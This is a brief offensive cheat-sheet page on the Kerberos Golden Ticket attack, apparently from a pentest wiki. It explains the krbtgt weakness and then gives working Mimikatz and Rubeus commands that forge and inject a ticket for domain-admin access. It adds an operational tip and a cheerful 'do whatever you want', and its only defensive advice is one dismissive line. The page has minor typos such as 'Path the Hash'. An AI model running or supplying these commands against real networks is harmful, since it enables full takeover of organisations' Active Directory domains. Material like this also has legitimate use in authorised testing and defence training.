Golden Tickets

Vulnerability
Prerequisites
Exploit
Recommendations

Vulnerability

Kerberos authentication protocol involves an Active Directory Key Distribution Service which uses a service account named krbtgt. If you manage to retrieve the password hash of this service account, you would be able to create Keberos TGT with highest privileges possible on the targeted domain with Path the Hash method.

Since krbtgt password is by default configured to never change.

Prerequisites

Having the password hash of krbtgt domain user.
Having the targeted domain SID.

Exploit

# With Mimikatz, purge tickets in your current session.
kerberos::purge

# Forge the golden ticket for your user.
kerberos::golden /user:$username /domain:$domain /sid:$domain_sid /krbtgt:$hash /ptt

# You can also use Rubeus to generate the golden ticket and import it in a dummy session.
.\Rubeus.exe golden /aes256:$hash /user:$username /domain:$domain /sid:$sid /nowrap
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:$domain /username:$username /password:$whatever /ticket:$Base64EncodedTicket

Your user is now in the most privileged group in the Active Directory, including Domain Admins. You can do whatever you want, enjoy!

If you want to connect remotely to a machine, use the hostname, not the IP. Golden Tickets attack consists in leveraging Kerberos authentication by performing Overpass The Hash. If you specify the IP of the target, you’ll force NTLM authentication, which will fail.

Recommendations

Nothing to do here, simply don’t disclose krbtgt hash.

Golden Tickets

Table of contents

Vulnerability

Prerequisites

Exploit

Recommendations